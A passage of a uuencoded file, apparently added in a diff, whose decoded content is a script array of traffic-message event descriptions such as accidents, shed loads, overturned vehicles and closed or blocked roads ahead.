+M96AI8VQE<R!S;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT*',I+B!3
+M;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR-CA=("`](")V96AI
+M8VQE<R!S;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT*',I+B!3;&]W
+M('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR-CE=("`](")V96AI8VQE
+M<R!S;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT*',I+B!3;&]W('1R
+M869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR-S!=("`](")V96AI8VQE<R!S
+M;&]W:6YG('1O(&QO;VL@870@*%$I(&%C8VED96YT*',I+B!3;&]W('1R869F
+M:6,@97AP96-T960B.PH@("`@)$5V96YT6S(W,5T@(#T@(G9E:&EC;&5S('-L
+M;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E;G0H<RDN($AE879Y('1R869F
+M:6,B.PH@("`@)$5V96YT6S(W,ET@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@
+M;&]O:R!A="`H42D@86-C:61E;G0H<RDN($AE879Y('1R869F:6,@97AP96-T
+M960B.PH@("`@)$5V96YT6S(W-%T@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@
+M;&]O:R!A="`H42D@86-C:61E;G0H<RDN(%1R869F:6,@8G5I;&1I;F<@=7`B
+M.PH@("`@)$5V96YT6S(W-5T@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O
+M:R!A="!A8V-I9&5N="X@1&5L87ES("A1*2(["B`@("`D179E;G1;,C<V72`@
+M/2`B=F5H:6-L97,@<VQO=VEN9R!T;R!L;V]K(&%T(&%C8VED96YT+B!$96QA
+M>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LR-S==("`](")V96AI8VQE
+M<R!S;&]W:6YG('1O(&QO;VL@870@86-C:61E;G0N($QO;F<@9&5L87ES("A1
+M*2(["B`@("`D179E;G1;,C<X72`@/2`B*%$I('-H960@;&]A9"AS*2X@4W1A
+M=&EO;F%R>2!T<F%F9FEC(CL*("`@("1%=F5N=%LR-SE=("`]("(H42D@<VAE
+M9"!L;V%D*',I+B!3=&%T:6]N87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%
+M=F5N=%LR.#!=("`]("(H42D@<VAE9"!L;V%D*',I+B!3=&%T:6]N87)Y('1R
+M869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR.#%=("`]("(H42D@<VAE9"!L
+M;V%D*',I+B!3=&%T:6]N87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N
+M=%LR.#)=("`]("(H42D@<VAE9"!L;V%D*',I+B!3=&%T:6]N87)Y('1R869F
+M:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR.#-=("`]("(H42D@<VAE9"!L;V%D
+M*',I+B!3=&%T:6]N87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LR
+M.#1=("`]("(H42D@<VAE9"!L;V%D*',I+B!$86YG97(@;V8@<W1A=&EO;F%R
+M>2!T<F%F9FEC(CL*("`@("1%=F5N=%LR.#5=("`]("(H42D@<VAE9"!L;V%D
+M*',I+B!1=65U:6YG('1R869F:6,B.PH@("`@)$5V96YT6S(X-ET@(#T@(BA1
+M*2!S:&5D(&QO860H<RDN(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@
+M)$5V96YT6S(X-UT@(#T@(BA1*2!S:&5D(&QO860H<RDN(%%U975I;F<@=')A
+M9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(X.%T@(#T@(BA1*2!S:&5D(&QO
+M860H<RDN(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(X
+M.5T@(#T@(BA1*2!S:&5D(&QO860H<RDN(%%U975I;F<@=')A9F9I8R!F;W(@
+M:VTB.PH@("`@)$5V96YT6S(Y,%T@(#T@(BA1*2!S:&5D(&QO860H<RDN(%%U
+M975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S(Y,5T@(#T@(BA1
+M*2!S:&5D(&QO860H<RDN($1A;F=E<B!O9B!Q=65U:6YG('1R869F:6,B.PH@
+M("`@)$5V96YT6S(Y,ET@(#T@(BA1*2!S:&5D(&QO860H<RDN(%-L;W<@=')A
+M9F9I8R(["B`@("`D179E;G1;,CDS72`@/2`B*%$I('-H960@;&]A9"AS*2X@
+M4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;,CDT72`@/2`B*%$I
+M('-H960@;&]A9"AS*2X@4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,CDU72`@/2`B*%$I('-H960@;&]A9"AS*2X@4VQO=R!T<F%F9FEC(&9O
+M<B!K;2(["B`@("`D179E;G1;,CDV72`@/2`B*%$I('-H960@;&]A9"AS*2X@
+M4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;,CDW72`@/2`B*%$I
+M('-H960@;&]A9"AS*2X@4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;,CDX72`@/2`B*%$I('-H960@;&]A9"AS*2X@4VQO=R!T<F%F9FEC(&5X
+M<&5C=&5D(CL*("`@("1%=F5N=%LR.3E=("`]("(H42D@<VAE9"!L;V%D*',I
+M+B!(96%V>2!T<F%F9FEC(CL*("`@("1%=F5N=%LS,#!=("`]("(H42D@<VAE
+M9"!L;V%D*',I+B!(96%V>2!T<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%=F5N
+M=%LS,#%=("`]("(H42D@<VAE9"!L;V%D*',I+B!4<F%F9FEC(&9L;W=I;F<@
+M9G)E96QY(CL*("`@("1%=F5N=%LS,#)=("`]("(H42D@<VAE9"!L;V%D*',I
+M+B!4<F%F9FEC(&)U:6QD:6YG('5P(CL*("`@("1%=F5N=%LS,#-=("`](")B
+M;&]C:V5D(&)Y("A1*2!S:&5D(&QO860H<RDB.PH@("`@)$5V96YT6S,P-%T@
+M(#T@(BA1*2!S:&5D(&QO860H<RDN(%)I9VAT(&QA;F4@8FQO8VME9"(["B`@
+M("`D179E;G1;,S`U72`@/2`B*%$I('-H960@;&]A9"AS*2X@0V5N=')E(&QA
+M;F4@8FQO8VME9"(["B`@("`D179E;G1;,S`V72`@/2`B*%$I('-H960@;&]A
+M9"AS*2X@3&5F="!L86YE(&)L;V-K960B.PH@("`@)$5V96YT6S,P-UT@(#T@
+M(BA1*2!S:&5D(&QO860H<RDN($AA<F0@<VAO=6QD97(@8FQO8VME9"(["B`@
+M("`D179E;G1;,S`X72`@/2`B*%$I('-H960@;&]A9"AS*2X@5'=O(&QA;F5S
+M(&)L;V-K960B.PH@("`@)$5V96YT6S,P.5T@(#T@(BA1*2!S:&5D(&QO860H
+M<RDN(%1H<F5E(&QA;F5S(&)L;V-K960B.PH@("`@)$5V96YT6S,Q,%T@(#T@
+M(G-H960@;&]A9"X@1&5L87ES("A1*2(["B`@("`D179E;G1;,S$Q72`@/2`B
+M<VAE9"!L;V%D+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N=%LS
+M,3)=("`](")S:&5D(&QO860N($QO;F<@9&5L87ES("A1*2(["B`@("`D179E
+M;G1;,S$S72`@/2`B*%$I(&)R;VME;B!D;W=N('9E:&EC;&4H<RDN(%-T871I
+M;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,S$T72`@/2`B*%$I(&)R;VME
+M;B!D;W=N('9E:&EC;&4H<RDN($1A;F=E<B!O9B!S=&%T:6]N87)Y('1R869F
+M:6,B.PH@("`@)$5V96YT6S,Q-5T@(#T@(BA1*2!B<F]K96X@9&]W;B!V96AI
+M8VQE*',I+B!1=65U:6YG('1R869F:6,B.PH@("`@)$5V96YT6S,Q-ET@(#T@
+M(BA1*2!B<F]K96X@9&]W;B!V96AI8VQE*',I+B!$86YG97(@;V8@<75E=6EN
+M9R!T<F%F9FEC(CL*("`@("1%=F5N=%LS,3==("`]("(H42D@8G)O:V5N(&1O
+M=VX@=F5H:6-L92AS*2X@4VQO=R!T<F%F9FEC(CL*("`@("1%=F5N=%LS,3A=
+M("`]("(H42D@8G)O:V5N(&1O=VX@=F5H:6-L92AS*2X@4VQO=R!T<F%F9FEC
+M(&5X<&5C=&5D(CL*("`@("1%=F5N=%LS,3E=("`]("(H42D@8G)O:V5N(&1O
+M=VX@=F5H:6-L92AS*2X@2&5A=GD@=')A9F9I8R(["B`@("`D179E;G1;,S(P
+M72`@/2`B*%$I(&)R;VME;B!D;W=N('9E:&EC;&4H<RDN($AE879Y('1R869F
+M:6,@97AP96-T960B.PH@("`@)$5V96YT6S,R,5T@(#T@(BA1*2!B<F]K96X@
+M9&]W;B!V96AI8VQE*',I+B!4<F%F9FEC(&9L;W=I;F<@9G)E96QY(CL*("`@
+M("1%=F5N=%LS,C)=("`]("(H42D@8G)O:V5N(&1O=VX@=F5H:6-L92AS*2Y4
+M<F%F9FEC(&)U:6QD:6YG('5P(CL*("`@("1%=F5N=%LS,C-=("`](")B;&]C
+M:V5D(&)Y("A1*2!B<F]K96X@9&]W;B!V96AI8VQE*',I+B(["B`@("`D179E
+M;G1;,S(T72`@/2`B*%$I(&)R;VME;B!D;W=N('9E:&EC;&4H<RDN(%)I9VAT
+M(&QA;F4@8FQO8VME9"(["B`@("`D179E;G1;,S(U72`@/2`B*%$I(&)R;VME
+M;B!D;W=N('9E:&EC;&4H<RDN($-E;G1R92!L86YE(&)L;V-K960B.PH@("`@
+M)$5V96YT6S,R-ET@(#T@(BA1*2!B<F]K96X@9&]W;B!V96AI8VQE*',I+B!,
+M969T(&QA;F4@8FQO8VME9"(["B`@("`D179E;G1;,S(W72`@/2`B*%$I(&)R
+M;VME;B!D;W=N('9E:&EC;&4H<RDN($AA<F0@<VAO=6QD97(@8FQO8VME9"([
+M"B`@("`D179E;G1;,S(X72`@/2`B*%$I(&)R;VME;B!D;W=N('9E:&EC;&4H
+M<RDN(%1W;R!L86YE<R!B;&]C:V5D(CL*("`@("1%=F5N=%LS,CE=("`]("(H
+M42D@8G)O:V5N(&1O=VX@=F5H:6-L92AS*2X@5&AR964@;&%N97,@8FQO8VME
+M9"(["B`@("`D179E;G1;,S,P72`@/2`B8G)O:V5N(&1O=VX@=F5H:6-L92X@
+M1&5L87ES("A1*2(["B`@("`D179E;G1;,S,Q72`@/2`B8G)O:V5N(&1O=VX@
+M=F5H:6-L92X@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;,S,R
+M72`@/2`B8G)O:V5N(&1O=VX@=F5H:6-L92X@3&]N9R!D96QA>7,@*%$I(CL*
+M("`@("1%=F5N=%LS,S-=("`](")A8V-I9&5N="!C;&5A<F5D(CL*("`@("1%
+M=F5N=%LS,S1=("`](")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;
+M,S,U72`@/2`B86-C:61E;G0@:6YV;VQV:6YG("AA+U$I(&)U<RAE<RDB.PH@
+M("`@)$5V96YT6S,S-ET@(#T@(BA1*2!O:6P@<W!I;&QA9V4@86-C:61E;G0H
+M<RDB.PH@("`@)$5V96YT6S,S-UT@(#T@(BA1*2!O=F5R='5R;F5D('9E:&EC
+M;&4H<RDB.PH@("`@)$5V96YT6S,S.%T@(#T@(BA1*2!O=F5R='5R;F5D(&AE
+M879Y(&QO<G(H>2]I97,I(CL*("`@("1%=F5N=%LS,SE=("`]("(H42D@:F%C
+M:VMN:69E9"!T<F%I;&5R*',I(CL*("`@("1%=F5N=%LS-#!=("`]("(H42D@
+M:F%C:VMN:69E9"!C87)A=F%N*',I(CL*("`@("1%=F5N=%LS-#%=("`]("(H
+M42D@:F%C:VMN:69E9"!A<G1I8W5L871E9"!L;W)R*'DO:65S*2(["B`@("`D
+M179E;G1;,S0R72`@/2`B*%$I('9E:&EC;&4H<RD@<W!U;B!A<F]U;F0B.PH@
+M("`@)$5V96YT6S,T,UT@(#T@(BA1*2!E87)L:65R(&%C8VED96YT*',I(CL*
+M("`@("1%=F5N=%LS-#1=("`](")A8V-I9&5N="!I;G9E<W1I9V%T:6]N('=O
+M<FLB.PH@("`@)$5V96YT6S,T-5T@(#T@(BA1*2!S96-O;F1A<GD@86-C:61E
+M;G0H<RDB.PH@("`@)$5V96YT6S,T-ET@(#T@(BA1*2!B<F]K96X@9&]W;B!B
+M=7,H97,I(CL*("`@("1%=F5N=%LS-#==("`]("(H42D@;W9E<FAE:6=H="!V
+M96AI8VQE*',I(CL*("`@("1%=F5N=%LS-#A=("`]("(H42D@86-C:61E;G0H
+M<RDN(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S,T
+M.5T@(#T@(BA1*2!A8V-I9&5N="AS*2X@475E=6EN9R!T<F%F9FEC(&9O<B!K
+M;2(["B`@("`D179E;G1;,S4P72`@/2`B*%$I(&%C8VED96YT*',I+B!3;&]W
+M('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LS-3%=("`]("(H42D@86-C
+M:61E;G0H<RD@:6X@<F]A9'=O<FMS(&%R96$B.PH@("`@)$5V96YT6S,U,ET@
+M(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E;G0H
+M<RDN(%-T871I;VYA<GD@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S,U
+M,UT@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E
+M;G0H<RDN(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S,U
+M-%T@(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E
+M;G0H<RDN(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S,U-5T@
+M(#T@(G9E:&EC;&5S('-L;W=I;F<@=&\@;&]O:R!A="`H42D@86-C:61E;G0H
+M<RDN($1A;F=E<B(["B`@("`D179E;G1;,S4V72`@/2`B*%$I('-H960@;&]A
+M9"AS*2X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;
+M,S4W72`@/2`B*%$I('-H960@;&]A9"AS*2X@475E=6EN9R!T<F%F9FEC(&9O
+M<B!K;2(["B`@("`D179E;G1;,S4X72`@/2`B*%$I('-H960@;&]A9"AS*2X@
+M4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;,S4Y72`@/2`B*%$I
+M('-H960@;&]A9"AS*2X@1&%N9V5R(CL*("`@("1%=F5N=%LS-C!=("`]("(H
+M42D@;W9E<G1U<FYE9"!V96AI8VQE*',I+B!3=&%T:6]N87)Y('1R869F:6,B
+M.PH@("`@)$5V96YT6S,V,5T@(#T@(BA1*2!O=F5R='5R;F5D('9E:&EC;&4H
+M<RDN($1A;F=E<B!O9B!S=&%T:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT
+M6S,V,ET@(#T@(BA1*2!O=F5R='5R;F5D('9E:&EC;&4H<RDN(%%U975I;F<@
+M=')A9F9I8R(["B`@("`D179E;G1;,S8S72`@/2`B*%$I(&]V97)T=7)N960@
+M=F5H:6-L92AS*2X@1&%N9V5R(&]F('%U975I;F<@=')A9F9I8R(["B`@("`D
+M179E;G1;,S8T72`@/2`B*%$I(&]V97)T=7)N960@=F5H:6-L92AS*2X@4VQO
+M=R!T<F%F9FEC(CL*("`@("1%=F5N=%LS-C5=("`]("(H42D@;W9E<G1U<FYE
+M9"!V96AI8VQE*',I+B!3;&]W('1R869F:6,@97AP96-T960B.PH@("`@)$5V
+M96YT6S,V-ET@(#T@(BA1*2!O=F5R='5R;F5D('9E:&EC;&4H<RDN($AE879Y
+M('1R869F:6,B.PH@("`@)$5V96YT6S,V-UT@(#T@(BA1*2!O=F5R='5R;F5D
+M('9E:&EC;&4H<RDN($AE879Y('1R869F:6,@97AP96-T960B.PH@("`@)$5V
+M96YT6S,V.%T@(#T@(BA1*2!O=F5R='5R;F5D('9E:&EC;&4H<RDN(%1R869F
+M:6,@8G5I;&1I;F<@=7`B.PH@("`@)$5V96YT6S,V.5T@(#T@(F)L;V-K960@
+M8GD@*%$I(&]V97)T=7)N960@=F5H:6-L92AS*2(["B`@("`D179E;G1;,S<P
+M72`@/2`B*%$I(&]V97)T=7)N960@=F5H:6-L92AS*2X@4FEG:'0@;&%N92!B
+M;&]C:V5D(CL*("`@("1%=F5N=%LS-S%=("`]("(H42D@;W9E<G1U<FYE9"!V
+M96AI8VQE*',I+B!#96YT<F4@;&%N92!B;&]C:V5D(CL*("`@("1%=F5N=%LS
+M-S)=("`]("(H42D@;W9E<G1U<FYE9"!V96AI8VQE*',I+B!,969T(&QA;F4@
+M8FQO8VME9"(["B`@("`D179E;G1;,S<S72`@/2`B*%$I(&]V97)T=7)N960@
+M=F5H:6-L92AS*2X@5'=O(&QA;F5S(&)L;V-K960B.PH@("`@)$5V96YT6S,W
+M-%T@(#T@(BA1*2!O=F5R='5R;F5D('9E:&EC;&4H<RDN(%1H<F5E(&QA;F5S
+M(&)L;V-K960B.PH@("`@)$5V96YT6S,W-5T@(#T@(F]V97)T=7)N960@=F5H
+M:6-L92X@1&5L87ES("A1*2(["B`@("`D179E;G1;,S<V72`@/2`B;W9E<G1U
+M<FYE9"!V96AI8VQE+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N
+M=%LS-S==("`](")O=F5R='5R;F5D('9E:&EC;&4N($QO;F<@9&5L87ES("A1
+M*2(["B`@("`D179E;G1;,S<X72`@/2`B*%$I(&]V97)T=7)N960@=F5H:6-L
+M92AS*2X@1&%N9V5R(CL*("`@("1%=F5N=%LS-SE=("`](")3=&%T:6]N87)Y
+M('1R869F:6,@9'5E('1O("A1*2!E87)L:65R(&%C8VED96YT*',I(CL*("`@
+M("1%=F5N=%LS.#!=("`](")$86YG97(@;V8@<W1A=&EO;F%R>2!T<F%F9FEC
+M(&1U92!T;R`H42D@96%R;&EE<B!A8V-I9&5N="AS*2(["B`@("`D179E;G1;
+M,S@Q72`@/2`B475E=6EN9R!T<F%F9FEC(&1U92!T;R`H42D@96%R;&EE<B!A
+M8V-I9&5N="AS*2(["B`@("`D179E;G1;,S@R72`@/2`B1&%N9V5R(&]F('%U
+M975I;F<@=')A9F9I8R!D=64@=&\@*%$I(&5A<FQI97(@86-C:61E;G0H<RDB
+M.PH@("`@)$5V96YT6S,X,UT@(#T@(E-L;W<@=')A9F9I8R!D=64@=&\@*%$I
+M(&5A<FQI97(@86-C:61E;G0H<RDB.PH@("`@)$5V96YT6S,X-5T@(#T@(DAE
+M879Y('1R869F:6,@9'5E('1O("A1*2!E87)L:65R(&%C8VED96YT*',I(CL*
+M("`@("1%=F5N=%LS.#==("`](")4<F%F9FEC(&)U:6QD:6YG('5P(&1U92!T
+M;R`H42D@96%R;&EE<B!A8V-I9&5N="AS*2(["B`@("`D179E;G1;,S@X72`@
+M/2`B1&5L87ES("A1*2!D=64@=&\@96%R;&EE<B!A8V-I9&5N="(["B`@("`D
+M179E;G1;,SDP72`@/2`B3&]N9R!D96QA>7,@*%$I(&1U92!T;R!E87)L:65R
+M(&%C8VED96YT(CL*("`@("1%=F5N=%LS.3%=("`](")A8V-I9&5N="!I;G9E
+M<W1I9V%T:6]N('=O<FLN($1A;F=E<B(["B`@("`D179E;G1;,SDR72`@/2`B
+M*%$I('-E8V]N9&%R>2!A8V-I9&5N="AS*2X@1&%N9V5R(CL*("`@("1%=F5N
+M=%LS.3-=("`]("(H42D@8G)O:V5N(&1O=VX@=F5H:6-L92AS*2X@1&%N9V5R
+M(CL*("`@("1%=F5N=%LS.31=("`]("(H42D@8G)O:V5N(&1O=VX@:&5A=GD@
+M;&]R<BAY+VEE<RDN($1A;F=E<B(["B`@("`D179E;G1;,SDU72`@/2`B<F]A
+M9"!C;&5A<F5D(CL*("`@("1%=F5N=%LS.39=("`](")I;F-I9&5N="!C;&5A
+M<F5D(CL*("`@("1%=F5N=%LS.3==("`](")R97-C=64@86YD(')E8V]V97)Y
+M('=O<FL@:6X@<')O9W)E<W,B.PH@("`@)$5V96YT6S,Y.5T@(#T@(FUE<W-A
+M9V4@8V%N8V5L;&5D(CL*("`@("1%=F5N=%LT,#%=("`](")C;&]S960B.PH@
+M("`@)$5V96YT6S0P,ET@(#T@(F)L;V-K960B.PH@("`@)$5V96YT6S0P,UT@
+M(#T@(F-L;W-E9"!F;W(@:&5A=GD@=F5H:6-L97,@*&]V97(@42DB.PH@("`@
+M)$5V96YT6S0P-%T@(#T@(FYO('1H<F]U9V@@=')A9F9I8R!F;W(@:&5A=GD@
+M;&]R<FEE<R`H;W9E<B!1*2(["B`@("`D179E;G1;-#`U72`@/2`B;F\@=&AR
+M;W5G:"!T<F%F9FEC(CL*("`@("1%=F5N=%LT,#9=("`]("(H42!T:"D@96YT
+M<GD@<VQI<"!R;V%D(&-L;W-E9"(["B`@("`D179E;G1;-#`W72`@/2`B*%$@
+M=&@I(&5X:70@<VQI<"!R;V%D(&-L;W-E9"(["B`@("`D179E;G1;-#`X72`@
+M/2`B<VQI<"!R;V%D<R!C;&]S960B.PH@("`@)$5V96YT6S0P.5T@(#T@(G-L
+M:7`@<F]A9"!R97-T<FEC=&EO;G,B.PH@("`@)$5V96YT6S0Q,%T@(#T@(F-L
+M;W-E9"!A:&5A9"X@4W1A=&EO;F%R>2!T<F%F9FEC(CL*("`@("1%=F5N=%LT
+M,3%=("`](")C;&]S960@86AE860N(%-T871I;VYA<GD@=')A9F9I8R!F;W(@
+M:VTB.PH@("`@)$5V96YT6S0Q,ET@(#T@(F-L;W-E9"!A:&5A9"X@4W1A=&EO
+M;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-#$S72`@/2`B8VQO
+M<V5D(&%H96%D+B!3=&%T:6]N87)Y('1R869F:6,@9F]R(&MM(CL*("`@("1%
+M=F5N=%LT,31=("`](")C;&]S960@86AE860N(%-T871I;VYA<GD@=')A9F9I
+M8R!F;W(@:VTB.PH@("`@)$5V96YT6S0Q-5T@(#T@(F-L;W-E9"!A:&5A9"X@
+M4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-#$V72`@
+M/2`B8VQO<V5D(&%H96%D+B!$86YG97(@;V8@<W1A=&EO;F%R>2!T<F%F9FEC
+M(CL*("`@("1%=F5N=%LT,3==("`](")C;&]S960@86AE860N(%%U975I;F<@
+M=')A9F9I8R(["B`@("`D179E;G1;-#$X72`@/2`B8VQO<V5D(&%H96%D+B!1
+M=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT,3E=("`](")C
+M;&]S960@86AE860N(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V
+M96YT6S0R,%T@(#T@(F-L;W-E9"!A:&5A9"X@475E=6EN9R!T<F%F9FEC(&9O
+M<B!K;2(["B`@("`D179E;G1;-#(Q72`@/2`B8VQO<V5D(&%H96%D+B!1=65U
+M:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT,C)=("`](")C;&]S
+M960@86AE860N(%%U975I;F<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT
+M6S0R,UT@(#T@(F-L;W-E9"!A:&5A9"X@1&%N9V5R(&]F('%U975I;F<@=')A
+M9F9I8R(["B`@("`D179E;G1;-#(T72`@/2`B8VQO<V5D(&%H96%D+B!3;&]W
+M('1R869F:6,B.PH@("`@)$5V96YT6S0R-5T@(#T@(F-L;W-E9"!A:&5A9"X@
+M4VQO=R!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-#(V72`@/2`B8VQO
+M<V5D(&%H96%D+B!3;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT
+M,C==("`](")C;&]S960@86AE860N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@
+M("`@)$5V96YT6S0R.%T@(#T@(F-L;W-E9"!A:&5A9"X@4VQO=R!T<F%F9FEC
+M(&9O<B!K;2(["B`@("`D179E;G1;-#(Y72`@/2`B8VQO<V5D(&%H96%D+B!3
+M;&]W('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT,S!=("`](")C;&]S
+M960@86AE860N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;
+M-#,Q72`@/2`B8VQO<V5D(&%H96%D+B!(96%V>2!T<F%F9FEC(CL*("`@("1%
+M=F5N=%LT,S)=("`](")C;&]S960@86AE860N($AE879Y('1R869F:6,@97AP
+M96-T960B.PH@("`@)$5V96YT6S0S,UT@(#T@(F-L;W-E9"!A:&5A9"X@5')A
+M9F9I8R!F;&]W:6YG(&9R965L>2(["B`@("`D179E;G1;-#,T72`@/2`B8VQO
+M<V5D(&%H96%D+B!4<F%F9FEC(&)U:6QD:6YG('5P(CL*("`@("1%=F5N=%LT
+M,S5=("`](")C;&]S960@86AE860N($1E;&%Y<R`H42DB.PH@("`@)$5V96YT
+M6S0S-ET@(#T@(F-L;W-E9"!A:&5A9"X@1&5L87ES("A1*2!E>'!E8W1E9"([
+M"B`@("`D179E;G1;-#,W72`@/2`B8VQO<V5D(&%H96%D+B!,;VYG(&1E;&%Y
+M<R`H42DB.PH@("`@)$5V96YT6S0S.%T@(#T@(F)L;V-K960@86AE860N(%-T
+M871I;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;-#,Y72`@/2`B8FQO8VME
+M9"!A:&5A9"X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E
+M;G1;-#0P72`@/2`B8FQO8VME9"!A:&5A9"X@4W1A=&EO;F%R>2!T<F%F9FEC
+M(&9O<B!K;2(["B`@("`D179E;G1;-#0Q72`@/2`B8FQO8VME9"!A:&5A9"X@
+M4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-#0R72`@
+M/2`B8FQO8VME9"!A:&5A9"X@4W1A=&EO;F%R>2!T<F%F9FEC(&9O<B!K;2([
+M"B`@("`D179E;G1;-#0S72`@/2`B8FQO8VME9"!A:&5A9"X@4W1A=&EO;F%R
+M>2!T<F%F9FEC(&9O<B!K;2(["B`@("`D179E;G1;-#0T72`@/2`B8FQO8VME
+M9"!A:&5A9"X@1&%N9V5R(&]F('-T871I;VYA<GD@=')A9F9I8R(["B`@("`D
+M179E;G1;-#0U72`@/2`B8FQO8VME9"!A:&5A9"X@475E=6EN9R!T<F%F9FEC
+M(CL*("`@("1%=F5N=%LT-#9=("`](")B;&]C:V5D(&%H96%D+B!1=65U:6YG
+M('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT-#==("`](")B;&]C:V5D
+M(&%H96%D+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT
+M-#A=("`](")B;&]C:V5D(&%H96%D+B!1=65U:6YG('1R869F:6,@9F]R(&MM
+M(CL*("`@("1%=F5N=%LT-#E=("`](")B;&]C:V5D(&%H96%D+B!1=65U:6YG
+M('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT-3!=("`](")B;&]C:V5D
+M(&%H96%D+B!1=65U:6YG('1R869F:6,@9F]R(&MM(CL*("`@("1%=F5N=%LT
+M-3%=("`](")B;&]C:V5D(&%H96%D+B!$86YG97(@;V8@<75E=6EN9R!T<F%F
+M9FEC(CL*("`@("1%=F5N=%LT-3)=("`](")B;&]C:V5D(&%H96%D+B!3;&]W
+M('1R869F:6,B.PH@("`@)$5V96YT6S0U,UT@(#T@(F)L;V-K960@86AE860N
+M(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S0U-%T@(#T@(F)L
+M;V-K960@86AE860N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT
+M6S0U-5T@(#T@(F)L;V-K960@86AE860N(%-L;W<@=')A9F9I8R!F;W(@:VTB
+M.PH@("`@)$5V96YT6S0U-ET@(#T@(F)L;V-K960@86AE860N(%-L;W<@=')A
+M9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S0U-UT@(#T@(F)L;V-K960@86AE
+M860N(%-L;W<@=')A9F9I8R!F;W(@:VTB.PH@("`@)$5V96YT6S0U.%T@(#T@
+M(F)L;V-K960@86AE860N(%-L;W<@=')A9F9I8R!E>'!E8W1E9"(["B`@("`D
+M179E;G1;-#4Y72`@/2`B8FQO8VME9"!A:&5A9"X@2&5A=GD@=')A9F9I8R([
+M"B`@("`D179E;G1;-#8P72`@/2`B8FQO8VME9"!A:&5A9"X@2&5A=GD@=')A
+M9F9I8R!E>'!E8W1E9"(["B`@("`D179E;G1;-#8Q72`@/2`B8FQO8VME9"!A
+M:&5A9"X@5')A9F9I8R!F;&]W:6YG(&9R965L>2(["B`@("`D179E;G1;-#8R
+M72`@/2`B8FQO8VME9"!A:&5A9"X@5')A9F9I8R!B=6EL9&EN9R!U<"(["B`@
+M("`D179E;G1;-#8S72`@/2`B8FQO8VME9"!A:&5A9"X@1&5L87ES("A1*2([
+M"B`@("`D179E;G1;-#8T72`@/2`B8FQO8VME9"!A:&5A9"X@1&5L87ES("A1
+M*2!E>'!E8W1E9"(["B`@("`D179E;G1;-#8U72`@/2`B8FQO8VME9"!A:&5A
+M9"X@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LT-C9=("`](")S;&EP
+M(')O861S(')E;W!E;F5D(CL*("`@("1%=F5N=%LT-C==("`](")R96]P96YE
